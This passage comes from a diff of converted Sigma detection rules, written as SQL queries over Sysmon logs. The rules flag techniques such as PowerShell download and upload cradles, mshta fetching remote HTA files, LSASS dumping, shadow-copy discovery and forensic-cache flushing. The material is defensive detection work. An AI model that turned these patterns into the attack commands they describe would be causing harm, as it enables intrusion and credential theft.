'%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - 